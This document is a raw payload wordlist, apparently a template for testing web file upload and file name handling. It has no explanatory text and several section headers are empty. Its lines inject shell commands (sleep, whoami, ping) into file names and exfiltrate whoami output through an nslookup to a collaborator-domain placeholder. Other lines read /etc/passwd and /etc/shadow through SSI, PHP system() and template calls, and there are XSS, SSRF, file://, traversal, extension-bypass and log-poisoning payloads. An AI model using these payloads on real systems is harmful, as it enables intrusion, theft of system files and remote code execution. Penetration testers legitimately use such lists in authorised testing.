{originalPayload}<svg onload=alert(document.domain)>
{originalPayload}<svg onload=alert(document.domain)>
{originalPayload};.png
{originalPayload};.jpg
{originalPayload}.png;sleep(10)-- -.jpg
{originalPayload}.png;sleep(10)--%20-.jpg
{originalPayload}.jpg; sleep 10;
{originalPayload}.png; sleep 10;
{originalPayload}.jpg;%20sleep%2010;
{originalPayload}.png;%20sleep%2010;
{originalPayload};sleep 10;
{originalPayload};%20sleep%2010;
{originalPayload}.png||ping+-c+10+127.0.0.1||
{originalPayload}.png||ping+-c+10+localhost||
{originalPayload}.png||whoami>/var/www/images/output.txt||
{originalPayload}.png||nslookup+'whoami'.{collaboratorDomain}
{originalPayload}.png||nslookup+'whoami'.{collaboratorDomain}||.png
{originalPayload}.png?a=bbb||ping+-c+10+127.0.0.1||
{originalPayload}.png?a=bbb||ping+-c+10+localhost||
{originalPayload}.png?a=bbb; sleep 10;
{originalPayload}.png?a=bbb;%20sleep%2010;
https://sleep(10)-- -.jpg

{originalPayload}.png;cat /etc/hosts
{originalPayload}.png;$(`cat /etc/passwd`)
{originalPayload}.png;cat /etc/passwd
{originalPayload}.png;%0Acat%20/etc/passwd
{originalPayload}.png;{{ get_user_file("/etc/passwd") }}
{originalPayload}.png;<!--#exec cmd="/bin/cat /etc/passwd"-->
{originalPayload}.png;<!--#exec cmd="/bin/cat /etc/shadow"-->
{originalPayload}.png;<!--#exec cmd="/usr/bin/id;-->
{originalPayload}.png;system('cat /etc/passwd');
{originalPayload}.png;<?php system("cat /etc/passwd");?>
{originalPayload}.png;system('cat%20/etc/passwd')
{originalPayload}.png;system('id')
{originalPayload}.png;system('/usr/bin/id')

-- ------------------
-- localhost payloads
-- ------------------
https://localhost:6566/{fileName}.png
https://localhost/{fileName}.png
https://spoofed.burpcollaborator.net/{fileName}.png
https://127.0.0.1:6566/{fileName}.png
https://127.1:6566/{fileName}.png
https://127.0.0.1/{fileName}.png
https://127.1/{fileName}.png

-- -----------------
-- protocol payloads
-- -----------------
file://home/secret/carlos
file://etc/passwd

-- ----------------------------
-- directory traversal payloads
-- ----------------------------
{originalPayload}../../../tmp/lol.png
{originalPayload}/../../../tmp/lol.png
https://…:.jpg
https://…:.png


-- -----------------------------
-- uncommon file extension types
-- -----------------------------
{originalPayload}.png.php
{originalPayload}.png.Php5
{originalPayload}.png%20
{originalPayload}.png%0a
{originalPayload}.png%00
{originalPayload}.png%0d%0a
{originalPayload}.png/
{originalPayload}.png.\
{originalPayload}.
{originalPayload}.png....
{originalPayload}.png....
{originalPayload}.png
{originalPayload}.png.png
{originalPayload}.png.png.png
{originalPayload}.jpg
{originalPayload}.jpg.jpg
{originalPayload}.jpg.jpg.jpg
{originalPayload}.png.pHp5
{originalPayload}.png\x00.png
{originalPayload}.png%0a.png
{originalPayload}.png%0d%0a.png
{originalPayload}.phpJunk123png

-- ------------------
-- null byte payloads
-- ------------------
{originalPayload}.jpg%00.png
{originalPayload}.jpg%0delete0.png

-- -------------------------
-- Double-extension payloads
-- -------------------------

-- --------------------------
-- Special character payloads
-- --------------------------
https://{domain}/|{fileName}.jpg
{originalPayload}.jpg
https://{domain}/>{fileName}.jpg
https://{domain}/*{fileName}.jpg
https://{domain}/?{fileName}.jpg
https://{domain}/"{fileName}.jpg


-- ------------------
-- Long file payloads
https://{domain}/"{fileName}eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee.jpg
-- ------------------
-- --------------
-- xpath payloads
-- --------------

-- ------------
-- sql payloads
-- ------------

-- ---------------
-- Apache exploits
-- ---------------
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
